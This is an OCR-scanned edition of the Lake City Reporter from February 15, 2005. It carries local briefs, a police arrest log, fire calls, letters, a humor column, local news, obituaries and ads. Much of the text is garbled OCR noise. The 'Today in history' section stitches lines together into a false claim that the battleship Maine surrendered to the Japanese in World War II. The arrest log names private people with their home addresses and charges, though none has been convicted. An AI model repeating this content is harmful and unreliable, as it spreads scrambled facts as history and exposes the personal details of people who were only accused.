sci- ence, earth and space sci- ence, engineering, environ- mental, medicine and health, microbiology, physics and zoology. The region is com- prised of 10 counties: Columbia, Union, Suwannee, Bradford, Hamilton, Lafayette, Baker, Gilchrist, Dixie and Madison. Regional community busi- ness leaders will judge the projects 8:30 a.m. to 3:30 p.m. Feb. 23, with an open house for the community from 4-6 p.m. The awards ceremony will be 7 p.m. Feb. 24 at the high school in Union County. The winners will participate in the State Science and Engineering Fair in Orlando April 6-8. Parade to honor area veterans The Blue-Grey Army, Inc., the sponsoring organization for the Olustee Battle Festival, will honor veterans and service members who fought or were stationed in Iraq, Kuwait or Afghanistan. There will be special seat- ing made available for these military members at the parade 10 a.m. Saturday. For more information, call Faye Bowling-Warren at 755- 1097. Rodeo pageant set for March 20 The Miss Florida Gateway ProRodeo Pageant will be March 20 at the llth Annual Florida Gateway ProRodeo. Participants can win schol- arships, savings bonds, tiara, buckles and more. ' Applications are available at Smitty's Western Store, The, Money Man, the fair office, Fort White High School, Columbia High School, Lake City Middle School and Richardson Middle School. For more information, call 752-8822 or see the Web site at wwwcolumbiacountyfaikorg. Columbia County Resources has two $1000 scholarships for graduating seniors. Applications and cri- teria are available at FWHS and CHS, the fair office and the Web site. Pageant sign-up under way WHITE SPRINGS - Registration is under way for the 2005 Little Miss Azalea Contest. . This competition is for girls up to 10 years of age from Hamilton, Suwannee and Columbia counties. The winner will be crowned at the Suwannee River Wild Azalea Festival in White Springs March 19. Contestants can register at the White Springs Town Hall at the corner of Collins and Jewett Streets and receive a sponsor sign-up sheet. Deadline to turn in all spqn- sorship donations is 4 p.m. March 11. Presentation of awards will be at the music stage at the Florida Nature and Heritage Tourism Center. For more information, call 397-2310. Library book sale begins April 9 The Friends of the Library, Alachua County Library District, will have its annual spring book sale April 9 through 13 at the Friends of the Library Book House, 430 N. Main St., in Gainesville. Hours are 9 a.m. to 6 p.m. April 9, 1-6 p.m. April 10, noon to 8 p.m. April 11 and 12 and 10 a.m. to 6 p.m. April 13. For more information, call (352) 375-1676. Compiled from staff reports POLICE. AsuwOwr Arrest Log The following information was provided by local law enforcement agencies. The fol- lowing people have been arrested but not convicted. All people are presumed innocent . unless proven guilty. Tuesday, Feb. 8 Columbia County Sheriff's Office William David Bishop II, 2425 S.W. Newark Drive, Fort White, aggravated assault with a deadly weapon and improper exhibition of a dan- gerous weapon. Thursday, Feb. 10 Columbia County Sheriff's Office George Robert Spivey, 42, 394 S.W. Buffalo Court, failure to register as a sex offender. Shannon Carter Stamper, 32, 276 SW Merciful Place, Fort White, possession of cocaine and possession of drug paraphernalia. Janice Wilsoni Thomas, 41, 4347 284th St., Branford,. possession of controlled sub- stance and five counts of pos- session of drug parapherna- lia. Allethia Charentell' Brooken, 32, 3541 Victoria Park Road, Jacksonville, war- rants: violation of community control on original charges of two counts of grand theft, five counts of forgery and five counts of uttering a forgery. Alfredo Lee Johnson, 22, 835 Georgia Place, warrant: third-degree grand theft and two counts of uttering a for- gery. , g Fridy,''Feb. 11 .". Columbia County Sheriff's Office Sherrie Denise Jackson, 35, 978 N.W. Oakland St., armed burglary and grand theft. Lake City Police Department Richard Earl Gardner Sr., 46, 515 N.E. Hernando Ave., aggravated assault and resisting an officer without violence. M Charles Richard Brush, 18, 232 S.W. Vista Terrace, possession of drug parapher- nalia and possession of cocaine. Saturday, Feb. 12 Columbia County Sheriff's Office M Amy Neshea Yawn, 21, 1461 N.W. Baughn St., fraud- ulent use of credit cards, grand theft, forgery and uttering a forged instrument. Willie Frank Yawn, 21, 1461 N.W. Baughn St., fraud- ulent use of credit cards and grand theft. Lake City 1 Microdermabrasion -'4 -.i'2 i///Scfiw ,, 752-4888 21stAnnual , Baby Contest & .--- SModel/Beauty Search.- ., America's Cover Mss Aae Division Girls: Birth-llmo, 12-23mo, 2-3yr, 4-6yr, 7-9yr, 10-12yr, 13-15yr, 16up. Boys: Bltii-2yr. & 3-yr. Over 2 MILLION $$$ In cash and prizes awarded yearly! Qualifytodayto win a $10,000.00 bond at 2005 finals. For Information or a f /'N.. brochure call: Event Location (850) 476-3270 or '- March 12- Orange Park Mall (850) 206-4569 ... March 13- Lake City Mall SFrms available at ourwebaltse --- Register: 1:30 p.m.a - Email: covermlss@aol.com Police Department Winston Arthur Bell, 46, 157 S.W. Musket Place,. aggravated battery with motor vehicle and assault. Bubby Keegan Hildreth, 19, 532 Hillside Drive, Daytona Beach, possession of cocaine, possession of less " thain 20 grans of marijuana and possession of drug para- phernalia. Todd Christopher Smith, 20, 5820 Nohill Blvd., Port Orange, possession of cocaine, possession of less. than 20 grams of marijuana and possession of drug para- phernalia. Sunday, Feb. 13 Lake City Police Department Harold Roy Crews, 42, homeless, grand theft auto, possession of cocaine, posses- sion of drug paraphernalia and resisting officer without violence. Fire, EMS Calls Sunday, Feb. 13 2:08 a.m., rescue assist, 353 Lehigh Lane, one pri- mary unit responded. 9:26 a.m., rescue assist, children locked in car, 4066 Horseshoe Loop, two primary units responded. 11:16 a.m., brush fire, State Road 47 South, one pri- mary and two volunteer units responded. 11:50 a.m.,. gas leak, 355 Short Lane, four primary units responded. 1:35 p.m., brush fire, Marcus Road, one primary and three volunteer units responded. 2:11 p.m., brush fire, Federal Road, one primary and three volunteer units responded. 2:14 p.m., forestry fire, C orurnmSnatche, ,ab a. &Children's Boutique S Huge Inventory Blowout SA20/o-50%/o Storewide* I "' "' Today Thru Saturday, Feb. 19th only '- -- 363 SW Baya Drive (next to KFC) 961-9696 *Some exclusions apply Service STER ResidenfiatlCommerciat Seruices Fire & Water Restoration CarpetlUpholstery Cleaning Mold Remediation 755-7522 663 SE Baya Ave., Lake City, FL 32025 Marcus Road, two volunteer units responded. 2:48 p.m., brush fire, 4454 Wilson Springs Road, two primary and three volun- teer units responded. 2:54 p.m., brush pile fire, Chickadee Way, one volun- teer unit responded.- 5:55 p.m., brush fire,, Landress Terrace, one volun- teer unit responded. 6:59 p.m., nuisance fire, El Prado Avenue, one pri- mary unit responded. 7:44 p.m., rescue assist, Guerdon Street, three volun- teer units responded. 9:48 p.m., wreck, U.S. 90 West and Bascom Norris Drive, one primary unit responded. 10:19 p.m., breaker box fire, Martin Oaks mobile home park, two primary and one volunteer unit responded. Monday, Feb. 14 1:32 a.m., gas leak, South Main Boulevard, three pri- mary units responded. "* 10:25 a.m.,rescje'assist, 998 N.W. Virginia St., one pri- mary unit responded. 11:47 a.m., wreck, State Road 247 and Troy Road, one primary and one volunteer unit responded.. 3:49 p.m., wreck, U.S. 90 East at Vickers Terrace, one primary unit responded. Compiled from staff reports. IF WE CAN'T WIN, NO ONE CAN! NOFE 'Former Social Security , Executives and i UNiLES S Associates Even if you've been l\~- r' turned down before. Call Now! Initial Claims, Reconsiderations, and Hearings Isl le :Ai 6m-0 ", -..'- .".* '. :.-. ; "Finily;-chcking account that you can really get xuicte h bout: Ultimate Checking from Atlanuc Coast Federal. S It's the account that pays you interest like a money marker account, with the convenience . of full-service checking. Earn R, 2.00%"A* on deposit of lu[ $5.000 or more And this rate ,s guaranteed until July 31, 2005! - 0 'BRZCFS I ! 4A LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 LAKE CITY RE^PORTER REPORTER SERVING COLUMBIA COUNTY SINCE 1874 MICHAEL LEONARD, PUBLISHER TODD WILSON, EDITOR SUE BRANNON, CONTROLLER THE LAwKE f REPORTER IS PUBLISHED WITH PRIDE FOR RESIDENTS OF COLUMBiA AND SURROUNDING COUNTIES BY COMMUNITY NEWSPAPERS INC. OF ATHENS, GA. WE BELIEVE STRONG NEWSPAPERS BUILD STRONG COMMUNITIES - 'NEJiSR-rt-' T I ,,T DONE!" OUR PRIMARY GOAL IS TO PUBLISH DISTINGUISHED AND PROFITABLE COMMUNITY-ORIENT- ED NEWSPAPERS. THIS MISSION WILL BE ACCOMPLISHED THROUGH THE TEAMWORK OF PROFESSIONALS DEDICATED TO TRUTH, INTEGRITY, LOYALTY, QUALITY AND HARD WORK. DINK NESMITH, PRESIDENT TOM WOOD, CHAIRMAN For Rodney was one of our own T he Lake City Reporter family suffered a. loss a week ago today. Rodney Lord, an employee at this newspaper for more than 30 years, passed away. He was 55. During his career, Rodney worked in several capacities in the composition and production departments of this newspaper. For a time, he was a pressman, rolling the machines every day to make sure the newspapers of his beloved Lake City com- munity reached the doorstep on time and with a top-quality look. Rodney's career spanned an interesting time in the newspaper inditstry and proba- ,bly a-span that has seen the most intense changes in the business..Early on, Rodney and his co-workers worked with typewrit- ers and Linotype to firmly set the type for the pages and the awaiting presses. He adapted through the paste-up generation when computers first made their entrance and most recently worked his daily shift with the night crew, converting computer- produced page files into documents suit- able for high-speed Internet transfer to our press plant. A lot changed in the newspaper work- place during Rodney Lord's lifetime, but he adjusted and thrived without complaint or regret. He loved the newspaper business. In recent years, he battled severe health problems, but was always reliable in the office. Even on days when it was obvious he didn't feel'his best, he started his shift with a quick walk through all of the paper's departments, wishing everyone goodwill and giving best regards with a quick wit and a smile. Rodney was a good person. He was remembered as such through tears and laughter as friends and family gathered for a memorial visitation over the weekend and recounted special times from his life. Our deepest- sympathies are extended to his family. Rodney will be missed. Today estab- lished. In 1820, American suffragist Susan B. Anthony was born in Adams, Mass. In 1879, President Hayes signed a bill allowing female attorneys to argue cases before the Supreme Court. In 1898, the U.S. battleship Maine myste- riously sur- rendered to the Japanese during World War II. In 1961, 73 people, including an 18-mem- ber U.S. figure skating team en route to Czechoslovakia, were killed in a plane crash. ~~LM * ~ * LM 0* V C.) HUB C,) L- a) 0 z I- LM 0) E E 0 0 'p hbp~h.m E 0 LM &P- " ) . - iS i( II I0ETE O H3E I O How about a Monday paper? I read yet another editorial in the Saturday, Jan. 8, 2005, issue of your newspaper con- cerning what the Columbia County Commission should be about in regard to travel by the commissioners in this county. Enough is enough. If you want to try and accomplish something constructive why not figure a way for your newspaper to get into the 21st century and ensure that the Lake City Reporter is deliv- ered to your subscribers, and available for others to pur- chase, each day of the week. It is a sad commentary that the events each weekend in our area which are newswor- thy, and news from the sports world, is not available. to us until Tuesday. It seems that your newspaper is counting on the AP, and other news agencies, to cover for you each weekend and they do; however, local news of inter- est is not available to keep your readers abreast of what is happening in our area. If you are not authorized to pub- lish, print, and distribute your newspaper seven days a week, why not publish a paper and deliver it each Monday, and not have a paper on Tuesday? Advertisements generally, including flyers, are not that intense in your newspaper until Wednesday-Saturday of each week anyway. This change would better serve the public and certainly would not adversely affect your accounts receivable from those who advertise in your newspaper. I would appreciate you tak- ing this suggestion under advisement. I would also ask the other readers of your newspaper to contact your newspaper with their opinions and comments. This area of Florida has grown to the point that a good, reliable, local newspaper should be avail- able to us on a daily basis.. Charles A. Morgan Lake City What about drinking water? You ran three excellent arti- cles in Sunday's paper con- cerning future land develop- ment for Columbia County. You did a fine job of pre- senting the information every- one needs to know about where we live and how we must really be careful with our water supply. Much less has been said about the fact that many resi- dents are drinking the ground water. Their health is at risk if we continue with septic tanks and poor quality runoff into sinkholes. Frank Sedmera Lake City PHIL. HUDGINS Final tests for Dixie challenge OK, so I'm not 100 percent Dixie. I'm 89 percent. You don't know what I'm talking about, do you? Let me explain. One of my friends e-mailed me a quiz called "Yankee or Dixie?" It contains 20 multiple-choice questions: (You can test yourself at www. angelfire. com/ak2/intelligencerre- port/yankeedixiequiz.html) Many of the questions deal with pronun- ciations. For example, do you pronounce "caramel" as 1. Car-ml? 2. Car-a-mel? 3. Either? 4. Don't know. My answer was "car-a-mel," which, the quiz said, is common on the Atlantic coast and southern United States. That's the right answer for a Southerner. But I gave an answer from the Great Lakes region and northeast United States on this question: "What's that bug that rolls into a ball when you touch it? 1. Roly poly? 2. Pillbug? 3. Potato bug? 4. Sow bug." My answer was "pillbug." But the answer most common in the Southeast, the study said, is "roly poly." Honestly, my first answer would have been a "tumble bug," which is what my daddy, when he was in mixed company, called the bug that hung around the busi- ness side of an outhouse. But what idiot would touch a, tumble bug? Mary Long of Lawrenceville, Ga., agreed. She is a certified priviologist, which means she gives programs on privies, or outhous- es. "I heard those bugs help keep the eco- logical balance," she said, sounding like a teacher, which she was before retiring and taking up priviology. "You know, this is ter- rible, but I read that the flatulence of cows and other animals helps keep us balanced." Suddenly, we had gotten off the subject. So I called some entomologists, which is a fancy word for people who know bugs. "We just talked about them in class," said Dr. Mike Waldvogel of the North Carolina Cooperative Extension. His answer was "roly poly," I guess because he's been away from his native New York City long enough to know some Southern. And then he talked about "dog flies," so-called because they congregate around dogs. 'The answer is to bathe the dog," he said, "but no Southerner wants to do that because the dog is under the house anyway." We were off the subject again. "I call them both pillbugs and roly polies," said Mandy Comes, a lab technician at Rockingham (N.C.) Community College who orders bugs from catalogs, in which "pillbug" is preferred. By the way, she scored 54 percent Dixie. She grew up in southwest Virginia. Dr. Eric Benson, Extension entomologist at Clemson University, said he would have answered "pillbug." He's originally from New Jersey. But his secretary, Tammy. Morton, is a pure, undiluted Southerner. "Haven't you ever played with a roly poly?" she asked me. "They look like a little armadillo." Incidentally, she scored 100 percent Dixie. I guess 89 percent Dixie is not bad. I did spend some time in D.C. and Massachusetts. At least 11 percent of those regions must have stuck with me. Think I'll go get a soda. Phil Hudgins is senior editor of Community Newspapers, Inc. Contact him at phud- gins@cninewspapers.com. OPINIONS WANTED BY MAIL: Letters, P.O. Box 1709, Lake City, F 32056; or drop off at 180 E Duval St. downtown. BY FAX: (386) 752-9400 BY E-MAIL: twilson @ lakecity reporter. com II LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 BUSINESS Wrizon agrees to buy MCI for $6.75 billion - gnumq * m O 4 -b - - -a A a - - U U U~ ~. .~ ~ 0 S~ &AM Q.f "Copyrighted Material -- Syndicated Content 1-0 NfAvailable from Commercial News Providers',' 4b mom-A =K ____-__ . -4b * - ** 4 a ilb -.4 41. - 'S 0 WD 0 0 a 0 4D o - C ft - -C ~ C. -.~ C * C - * C - * w-- - C w ~ * -C - C ~ C C 49b 40 . - w * C 'February 17. 6:30pm-7:30pm for more info 752-2320 1937 SAWVEpiphany Ct., ake City 0 - V 4w 40 W 4w so % 4p I I : Irv, awavoinkmmu- m Q w o - -up do qb G t - . - -w * - - . -n= q S - * W 0 * - k~b 7; ~2 Epiphany CaTholicSchool Open House for 2005-2006 F L Proj-(1>ccti\e Kinder,,_artners 1111 V Ile" SItIvnpn. i ,1 '4 01 02 * ~ 0 w dib 9 --9 O * o * * qUl I ,1..... ....ILI) [B -1% .......... - .# 6A LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 LOCAL & STATE K.. Fort White considers _.. -- cemetery database : ,:: : L .. _, T''Il. I.-III i4 C, 'Ir, .'',r Paul Sehy, an Ichetucknee Springs State Park volunteer, drives.a tractor, which aids in the demolition of a produce shed Monday, as part of a park project to protect Rose Sink. Officials begin demolition work to protect Rose Sink By ASHLEY CISNEROS acisneros@lakecityreporter.com FORT WHITE The Fort White Town Council received a proposal for the possible development of a database and mapping system for its cemeteries. Aubrey Stanton Adams submitted a proposal detail- ing his services and provided three bids for three different levels of "specificity." The proposal comes after a situation in the town where a family needed to bury a loved one and could not find its space in the cemetery due to lack of proper records. Adams, who is skilled in graphic design and "database management, offered exam- ples of his experience in pro- viding his services for other cemeteries. "What I have presented here is includes a simple plan, a medium plan and a top-qual- ity plan," Adams said. The differences in price would reflect the degree of accuracy and precision put into the zoning. His plan would seek to identify who is buried in the cemetery and where exactly the person is buried. "Each burial would be assigned an alpha-numerical marking such as A-5 or F-10, so that families would know exactly where their loved ones are buried, and it could also be determined where vacancies exist," he explained. Adams described that the first step in the project would be to find the boundaries of the cemetery and the exact dimension of the property. Next, the cemetery would be divided and subdivided into zones. Although Adams did find records concerning Fort White's cemeteries on the Internet, he suspected that they were not up-to-date. "I found a list with more than 650 names of people buried here, and while it is good to start with, I don't know how current that infor- mation is," he said. John Gloskowski, council- man of district three, was con- cerned about potential unmarked graves. "What about people who are already there?" he said. "How will you know if there are no markings?" Adams then described a system where he can take a rod and place it into the ground to detect whether or not a coffin is buried. In addition, he also men- tioned another method using a radar, but commented that it would be more expensive than the rod method. Truett George, mayor of Fort White, suggested tabling the issue until the council could read Adam's proposal more carefully. "I want to see something done about this," he said. "But we need to get more informed about what exactly we need and what options we. have." Such options include get- ting volunteers to survey the cemeteries, instead of paying for the service, he said. Adams said that he was concerned that not all volun- teers may have the computer and graphic design skills needed for a thorough data- base and map. In other business, the council approved to hire Watertech, Inc. from Haines City to handle replacing char- coal media in the town's three water filters. The price tag of the project is $9,900 and should be com- pleted before the next water samples are taken at the end of March, said Public Works Director Edmund Hudson. By TONY BRITT tbritt@lakecityreporter.com COLUMBIA CITY The demolition of a produce shed on State Road 47 may seem like .rejuvenation for the small community, but it's actually a way of protecting the environ- ment. The demolition of the shack, which was housed less than 100 yards away from a sinkhole, is a sign of progress as Ichetucknee Springs State Park officials begin a restora- tion project to, protect Rose Sink. Monday morning, Jackie Sheffield, park ranger; Paul Sehy, park volunteer; Nick Turner, correctional officer with the Lancaster Correctional Institute in Trenton; and more than 10 inmates demolished the decrepit produce stand near the sinkhole. 'This is part of our restora- tion project to protect Rose Sink and we're removing some old buildings," said Tom Brown, Ichetucknee Springs State Park manager. "We also plan 'to put in a water reten- tion structure on the north end of the property. We'll fence it off and use it as an educational opportunity to let people know about water issues in the area." The property sitting near the intersection of County Road 240 and SR 47 was pur- chased from the landowners nearly three years ago as part of Gov. Jeb Bush's Florida Springs-Initiative. Brown said the demolition work was part of. the park's long-range plan to protect sinkholes in the area and another building on the site will be disassembled and moved. "This will be a perfect opportunity to show the peo-. ple on the basin tour some of the projects that we're doing to protect significant pieces of property in the watershed," he said. The Ichetucknee Springs Basin Working Group has scheduled a field trip of the Ichetucknee Springs Basin for today, which will include a stop at Rose Sink, where offi- cials will discuss cave explo- ration and land acquisition at the site. Three local sinks will be visited as part of the tour. The Ichetucknee trace is described as everything from Alligator Lake to the head spring at Ichetucknee Springs State Park and anywhere there is an opportunity where water can go'into a significant geologic feature such as Rose Sink. Brown said it's impor- tant to protect all such fea- tures as a means of protecting water quality. "We're trying to protect that structure (Rose Sink) because it's directly tied to the .head springs," Brown said. ., .. .. ,; t "Anything that goes in there shows up sometimes within six hours or within a week at the head springs." ' The funding for the demoli- tion and restoration of the area is also paid through the governor's Springs Initiative. The Florida Department of Transportation is also sched- uled to help build the water retention structure on the site. No date has been given for when construction of the water retention structure will begin because an archaeolog- ical survey has to be complet- ed by the state Division of Resources. suer *m "Copyrighted Material Syndicated Content Available from Commercial News Providers" 0 o Obituaries Maude Oween Beecher Mrs. Maude Oween Beecher, 76 of Lake City died Friday morning, February 11, 2005 at Alachua Gen- eral Hospital in-Gainesville. The daughter of the late Dewey Chesser and Lois O'Neal Chesser, Mrs. Beecher has been a resident of Lake City since 1968, coming here' from Miami, Florida. She was a home maker, as well as a loving mother, grandmother and great- grandmother who enjoyed spending time with her family. She loved to knit and painting artwork. Mrs. Beecher is survived by her husband of 39 years, Charles "Chuck" Beecher, Lake City, one son, Jerry Stricklen,. Brooksville, Florida, one daughter, Bonnie Morse (Kenneth), Spokane, WA, one sister, Monteen Scoggins, Pana- ma City, Florida. Four grandchil- dren, four great-grandchildren, as well as numerous nieces and neph- ews also survive. A Memorial service for Mrs. Beech- er will be conducted on Thursday, February 17, 2005 at 11:00 A.M. at Gateway-Forest Lawn Chapel. In lieu of flowers memorial donations may be made to the American Can- cer Society, 2119 SW 16th Street, Gainesville, Florida 32608. Ar- rangements are under the direction of GATEWAY~FOREST LAWN FUNERAL HOME, 3596 South Highway 441, Lake City. 386-752- 1954 Please sign the guestbook at Francis Joseph "F.J." Dicks Mr. Francis Joseph "F.J." Dicks, 88, of Lulu died Monday, February 14, 2005, at the Lake City Medical Center. Funeral arrangements are in- complete at this time but will ,be available after noon today. Arrange- ments are under the direction of GATEWAY-FOREST LAWN FUNERAL HOME, 3596 S. HWY 441, LIke City. (386) 752-1954.. Hendrik Dinkla, Jr. Mr. Hendrik Dinkla, Jr., 87 of Lake City died Saturday evening, February 12, 2005 at the Jenkins Veterans Domiciliary Home in Lake City. A native of Holland, Michigan, Mr. Din-kla moved to Lake City three years ago from Florahome, Fl. Mr. Dinkla was a veteran of the United States Annrmy having served in the South Pacific : - during WWII and was a Lutheran by faith. Mr. Dinkla is survived by one brother, William P. Dinkla (Della), Jacksonville and numerous nieces and nephews. No services are scheduled at this time. Cremation arrangements are under the direction of the GATE- WAY-FOREST LAWN FUNER- AL HOME, 3596 South Highway 441, Lake City. 386-752-1954.- Please sign our-Guestbook at. George William Mr. George William Yaeckel, Sr., 84, of McAlpin died Saturday morning, February 12, 2005 at is home. A native of Brooklyn, New York, Mr. Yaeckel moved to McAl- pin 35 years ago, coming from Mi- ami. Mr. Yaeckel was a Veteran of the United States Navy and of the : Catholic faith. He was retired from " Pan American Air- lines, he enjoyed reading and wood working. Mr. Yaeckel is survived by one son, George W. Yaeckel, Jr., McAlpin, two daughters, Susan Fowler (Rob- ert), Harrod, Ohio, Patti Ferrero (Dr. Frank), Lake City. Eight grandchil- dren, Sgt. Ryan Smith USMC, Twenty Nine Palms, CA., Kimbere- ly Ferrero, Gainesville, Ashley Fer- rero, Francesca Ferrero, Christopher Fefrero, Shawn Ferrero, all of Lake City, George W. Yaeckel, III, and Travis Donald Yaeckel, Apollo Beach, Florida. No services are scheduled at this time. In Lieu of flowers, please make donations to American Cancer Society, 2119 SW 16th Street, Gain- esville, Florida 32608 or Suwannee County Regional Library, 184 Ohio Ave. South, Live Oak, FL 32064. Cremation arrangements are under the direction of the GATEWAY- FOREST LAWN FUNERAL HOME, 3596 South Highway 441, Lake City. 386-752-1954. Please sign the guestbook at. Raymond C. "Ray" Williamson Mr. Raymond C. "Ray" William- son, 58, of Lake City, died Saturday evening in the Lake City Medical Center E.R. following a sudden ill- ness. A native of Madison, Florida, Mr. Williamson had been a resident of Lake City since 1997 having moved here with his family 5 from West Valley, Utah. He was the son of the late Delbert & 'A Eliza Buchanan Williamson. Mr. Williamson served a = mission for the Church of Jesus Christ of Latter Day Saints in the California North Mission Field and was a Veteran having served in the U.S. Marine Corp. He graduated with a B.A. Degree in Criminal Justice from the Florida Atlantic Uni-versity. He was a retired police officer having served in Palm -' * Beach, Osceola and Martin Counties. He then worked for nine '. - years in the Personal Protection Department of the Church of Jesus Christ of Latter Day Saints in Salt Lake City, Utah. In 1997 Mr. Williamson began working with the White Foundation where he was still employed as a Case Manager. Mr. Williamson was a member of the Church of Je-sus Christ of Latter Day Saints Lake City 1st Ward, he was a former Bishop and current Stake High Council Member, and was a faith- ful, lifelong member of the Church. His favorite hobby was his family. He is dearly loved by his wife and family, he was a wonderful hus- band, father and grandfather, "We will miss him, but we know that we will be together again." Mr. Williamson is survived by his wife of thirty years, Susan "Sue" Williamson; his children, Colin Williamson, Billy Williamson, Clin- ton Williamson (Rachael), Mandy Williamson, Stacy Williamson, all of Lake City and Kelly Casazza (Nick) of Clinton, Utah; his granddaughter, Kylie Casazza, Clinton, Utah; his five brothers, Leon Wil-liamson, New Mexico; Albert Williamson, Utah; Jimmy Williamson, Madison, Florida; Tommy William-son, Utah; Wayne Williamson, Utah; and his three sisters, Christine Johnson, Ollie Jones and Myrtle Adams all of Utah. Funeral services for Mr. Williamson will be conducted at 11:00 A.M., Tuesday, February 15, 2005 in the Church of Jesus Christ of Latter Day Saints with Bishop Mark Duren conducting. Interment will follow in the Midway Baptist Church Cemetery in Madison, Florida. The fam- ily received friends at the Church from 4-7 Monday evening. Arrange- ments are under the direction of the DEES FAMILY FUNERAL HOME & CREMATION SERV- ICES, 768 West Duval Street, Lake City. 961-9500. Obituaries are paid advertisements. For details, call the Lake City Reporter's classified department at 752-1293 LAKE CITY BUY IT! SELL IT! FIND IT.! 755 54|O Small and personalized Nutrition and Weight Management Classes every Mon. 7 pm. Call for appointment. Bill Frazier 719-2441. No charge. -bPEDIC PRESSURE RELIEVING IIL SWEDISH MATTRESSES AND PILLOWS [ 1I 1Nd,* ]1d : 1] -l :1r 'i'l l The Furniture Showplace Wholesale Sleep US 90 West (next to 84 Lumber) 752-9303 "Direct Cremation $595* Complete *(Basic services of funeral director and staff, removal fiom 2 l* AAiFUH & CREMATION SEROiC *Honoring all pre-neea plans *Compassionate professional care "Where serving your family isn't just our business, it's our way of life." 768 W. Duval Street Lake City, Florida Debra Parrish Dees (386) 961-9500 Licensed Funeral Director I I SUM 1m; ., LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 7A NATION & WORLD Final Charles' album swp rammys mk v 4w- a "'Copyrighted Material Pvilb fro Syndicated Contents- -Available from Commercial News Providers ' *~ f a - w - - a - 0 - - ~ * a - F- __ - 0hho or EktI~ 4 O* o o 6 - a - a.B - a - Han a min ut . Our customers receive a Complimentary copy of the Lake City Reporter when they drop off& pickup their cleaning SWhile Su lies Last N&W KiCen DNCO. Now Serving Columbia County 120 Gallon Tank Set & Filled only $129 gal. Seuor CeitizeE Diseaeuti Toll Free 1-877-203-2871 FURNITURE SHOWPLACE Wholesale Sleep Distributors US 90 West (Next to 84 Lumber) Lake City, 386-752-9303 es7 V i6 now ft bm n-noNEIr LFU *OWN [E EGO !AA S) o - Wp - 8 alb - v - I 0 qb.. .qmP 0 4w f"*bqo LAKE CITY REPORTER 5. Page 8A Tuesday, February 15, 2005 HEALTH Trip tips for you and your family P parents have asked : me for tips on travel- ing with children during the upcom- ing Spring Break. Whether you are traveling by car or plane, it pays. to plan __" ahead. t I If your Y child has problems with his *- i ears, like recurrent ear infec- v *:. .-. "'. qB tions,, .. Stephanie check with Sarkis your doc- S. [ .~tor before going on a plane flight. The change in air pressure during the flight may cause pain for children w-ho have chronic difficulties- \xth their ears. Give children gum to chew on takeoff and landing. For S: infants, nurse them or given them a bottle during takeoff and landing. These two activi- ties help reduce pain in chil- dren's ears. Bring snacks and plenty of' water. It is very important to keep kids hydrated, especially during warm weather. Set realistic goals for your trips with children., When on a car ride, you will need to stop more often. If your children act up in the car, find a safe place off an eXit and stop the car and wait. When the inappropriate behavior subsides, continue on your trip. Traveling as a family can be a fun and rewarding expe- rience. It pays to plan ahead! :Stephanie Sarkis PhD is a ? ..Licnu&Jd Mental Health S' 'l Ci S ' 'mail@stephaniesarkis.com or 758-2055. fwu( -b" a mn a~ 'S - * a a - - - q-p "Copyrighted Material - 3 Syndicated Content 0 - --'S Available from Commercial News Providers" no orwwwf bo w~d 4b . a a- - -a * l- -. - a a a - - -~-a. - a - -ao * .~ - .~ ~'- * - "S ~ a-a a a . 0 - "S - - a ___ a - a -~ w - a a- .Ndb Me *Preventive & Curative Medicine *Routinfe Health Maintenance *Gynecological Exam *Counseling fn A D.PH*Physical Exams *Others .jt.,n in C 1D AI H D.'i% 7 "9 6 S Noil accepting New Patients Call for an appoitinuenit 719-6843 comprehensive 0 nI Specia health *'nec , l aluros FREE *Women OB. Nu PREGNANCY TEST 'J 75 440 SW Pe Lak, I ,J.. living in: copic Surgen' 's Primary Health Care rse Practitioner on staff , Dr. Charles Delivery in Lake City 5-9190 rimeter Glen (off SW 47) e City, FL 32025 AVMED BC/BS CIGNA Medicare- Medincatid & Many more Insurances accepted - -:'.- ,. ",:-. '..." '" ,.' HEARING CARE FOR YOUR ENTIRE FAMILY Comprehensive Hearing Evaluations for Adults & Children SDigi"al Hearing Aids .Repair on All Brands *Batteries and Supplies *Assistive Listening Devices Call for information or to get an appointment 386-758-3222 Lake City 386-330-2904 Live Oak I ( ENYE ENTER of North Florida General Eye Care & Surgery B EYE EXAMS CATARACT 'SURGERY GLAUCOMA DIABETES LASERS EDUARDO M. BEDOYA, M.D. Board Certified, American Board of Ophthalmology 917 W. Duval St. Lake City Eye Physician & Surgeon CancerHope will 'U',, Treatment Centers m .m Lake City and Live Oak Ema CancerHope.com Specializing in Oncology since 1989 Comprehensive and Personalized Care Eric C. Rost, M.D. David S.Cho, M.D. Purendra P. Sinha, M.D. Board Certified -All Insurances .-ccepted- ANo Referral Necessary CancerHope of Li, e Oak 1500 Ohio Ae. Norlh Lise Oak.FL 32060 Phone: 386-362-1174 NowAccepting New Patients, General Medicine Women's Health C Lab X-Rav Ultrasound Cat Scan Nuclear Same Day Surgery Southern -I* Medical Group gerynter 404 NW Hall of Fame Drive, Lake City, FL m - PULMONARY CLINIC TREATS ALL RESPIRATORY DISEASES ~ NEW PATIENTS WELCOME ~ M. Choudhury, M.D. 155 NW Enterprise Way Suite A, Lake City Physician Referral 1-800-525-3248 * MicAscopic Vasectomy Reversal Impotence Surgery Specializing in the evaluation and treatment of Male Impotence Surgical and Medical Therapies All patients are given personal and confidential attention. -^*g iiin 4|ikj^^^ on.^ Lak Cty- 72 U Hy 0 es - -0 * Best equipment * Most adaiiuced treatment * Treat all tpcs of cancers SDIMRT PET CT Suwaiinee Valle. Cancer Center 795 S.\\. State Road 47 Lake City, FL 32025 Phone: 386-758-7822 ormarf6m m , w . " "1 o e - qw MWI LAKE CITY REPORTER, TUESDAY, FEBRUARY 15, 2005 9A Bulletin oard Richardson Middle STUDENT PROFILE playing sports and possibly choose a career involving animals. Achievements: First place County Science Fair, Honor Roll, AR Goal parties, Duke Talent Search What do you like best about school? Teachers. friends and most of all the experiments Teacher's comments Chrissie Reichert about student: Chrissie is an awesome student who is Name: Chrissie Reichert always eager and willing to School: Summers learn. Her jolly personality is Elementary extremely contagious, adding Parents: Dr. and Mrs. much joy to the class. Richard Reichert Age: 11 Principal's comments Grade: Fifth concerning student: S Principal: Art Holliday Chrissie is a student you will never see without a smile on' Clubs and/or organiza- her face. She is a delight to tions, both in and out of talk to whether you are an school, to which you adult or student and an awe- belong: Gifted, tennis, some role model for all. -Awana--- Student's comment on What would you like to being selected for 'do when you complete "Student Focus:" I feel your education? Continue privileged that I was selected. - Q ~ 0 ' z * - 0 eci, I - 